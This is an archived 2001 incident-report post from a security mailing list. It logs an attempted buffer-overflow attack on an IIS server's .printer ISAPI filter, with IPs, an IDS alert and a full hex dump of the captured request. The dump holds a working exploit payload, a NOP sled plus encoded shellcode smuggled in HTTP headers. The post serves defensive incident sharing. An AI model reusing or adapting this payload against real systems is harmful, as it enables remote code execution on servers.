Attempted WEB-IIS printer attempt Buffer Overflow

From: Jason Robertson (jasonat_private)
Date: Mon Jul 16 2001 - 18:49:51 PDT

  • Next message: Russell Fulton: "streams of fragments..."

    Date of Attack:  Jul 14, 2001
    Time of Attack: 09:00:38 am EDT
    
    Source of Attack: 
    IP Address: 198.109.163.170
    
    Destination of Attack:
    IP Address: 216.18.61.98
    Port: 80
    Protocol: TCP
    
    
    Description: 
    - Intruder attempted to access the printer isapi filter.
    
    Link: http://www.whitehats.com/info/IDS533
    
    Jason Robertson
    Network Analyst - iFuture Inc.
    http://www.ifuture.com
    
    
    [**] WEB-IIS printer attempt [**]
    Jul 14,01 09:00:38am    198.109.163.170:3265 -> 216.18.61.98:80
    TTL: 46 TOS: 0x0        ID:1675
    ***AP*** Seq: 3550615295 Ack: 2075228853 Win: 32120
    
    474554202F4E554C4C2E7072696E746572204854       GET./NULL.printer.HT
    54502F312E300D0A4265617675683A2090909090        TP/1.0..Beavuh:.....
    90909090909090909090909090909090EB035DEB        ..................].
    05E8F8FFFFFF83C5159090908BC533C966B9D702        ..............3.f...
    5080309540E2FA2D959564E214ADD8CF0595E196        P.0.@..-..d.........
    DD7E607D95959595C81E40147F9A6B6A6A1E4D1E        .~`}......@...kjj.M.
    E6A996661EE3ED96661EEBB5966E1EDB81A678C3        ...f....f....n....x.
    C2C41EAA966E1E672C9B9595956633E19DCCCA16        .....n.g,....f3.....
    5291D07772CCCACB1E581ED3B1965644749654A6        R..wr....X....VDt.T.
    5CF31E9D1ED389965654749796541E9596561E67        \.......VTt..T...V.g
    1E6B1E452C9E9595957DE1949595A655391055E0        .k.E,....}.....U9.U.
    6CC7C36AC241CF1E4D2C939595957DCE94959552        l..j.A..M,....}....R
    D2F19995959552D2FD9595959552D2F994959595        ......R......R......
    FF9518D2F1C518D285C518D281C56AC255FF9518        ..............j.U...
    D2F1C518D28DC518D289C56AC25552D2B5D19595        ...........j.UR.....
    9518D2B5C56AC2511ED2851CD2C91CD2F51ED289        .....j.Q............
    1CD2CD14DAD994949595F352D2C5959518D2E5C5        ...........R........
    18D2B5C5A655C5C5C5FF94C5C57D95959595C814        .....U.......}......
    78D56B6A6AC0C56AC25D6AE2856AC2716AE2896A        x.kjj..j.]j..j.qj..j
    C271FD95919595FFD56AC2451E7DC5FD94949595        .q.......j.E.}......
    6AC27D10559A103F959595A655C5D5C5D5C56AC2        j.}.U..?....U.....j.
    79166D6A9A11029595951E4DF352929795F352D2        y.mj.......M.R....R.
    9796ED52D291AA8D3EB6FF851892C5C66AC261FF        ...R....>.......j.a.
    A76AC249A65CC4C3C4C4C46AE2816AC2591055E1        .j.I.\.....j..j.Y.U.
    F50505050515AB95E1BA05050505FF95C3FD9591        ....................
    9595C06AE2816AC24D1055E1D505050505FF956A        ...j..j.M.U........j
    A3C0C66AC26D166D6AE1BB050505057E27FF95FD        ...j.m.mj......~'...
    95919595C0C66AC2691055E98D05050505E109FF        ......j.i.U.........
    95C3C5C06AE28D6AC241FFA76AC2497E1FC66AC2        ....j..j.A..j.I~..j.
    65FF956AC275A655391055E06CC4C7C3C66A47CF        e..j.u.U9.U.l....jG.
    CC3E777B56D2F0E1C5E7FAF6D4F1F1E7F0E6E695        .>w{V...............
    D9FAF4F1D9FCF7E7F4E7ECD495D6E7F0F4E1F0C5        ....................
    FCE5F095D2F0E1C6E1F4E7E1E0E5DCFBF3FAD495        ....................
    D6E7F0F4E1F0C5E7FAF6F0E6E6D495C5F0F0FEDB        ....................
    F4F8F0F1C5FCE5F095D2F9FAF7F4F9D4F9F9FAF6        ....................
    95C2E7FCE1F0D3FCF9F095C7F0F4F1D3FCF9F095        ....................
    C6F9F0F0E595D0EDFCE1C5E7FAF6F0E6E695D6F9        ....................
    FAE6F0DDF4FBF1F9F095C2C6DAD6DEA6A795C2C6        ....................
    D4C6E1F4E7E1E0E595E6FAF6FEF0E195F6F9FAE6        ....................
    F0E6FAF6FEF0E195F6FAFBFBF0F6E195E6F0FBF1        ....................
    95E7F0F6E395F6F8F1BBF0EDF0950D0A486F7374        ................Host
    3A20909090909090909090909090909090909090        :...................
    9090909090909090909090909090909090909090        ....................
    9090909090909090909090909090909090909090        ....................
    9090909090909090909090909090909090909090        ....................
    9090909090909090909090909090909090909090        ....................
    9090909090909090909090909090909090909090        ....................
    9090909090909090909090909090909090909090        ....................
    9090909090909090909090909090909090909090        ....................
    9090909090909090909090909090909090909090        ....................
    9090909090909090909090909090909090909090        ....................
    9090909090909090909090909090909090909090        ....................
    9090909090909090909090909090909090909090        ....................
    9090909090909090909090909090909090909090        ....................
    9090909090909090909090909090909090909090        ....................
    9090909090909090909090909090909090909090        ....................
    9090909090909090909090909090909090909090        ....................
    909090909090909090909033C0B09003D88B038B        ...........3........
    406033DBB32403C3FFE0EBB9909005318C6A0D0A        @`3..$.........1.j..
    0D0A                                            ..                  
    
    
    ---
    Jason Robertson                
    Network Analyst            
    jasonat_private    
    http://www.astroadvice.com      
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 10:21:26 PDT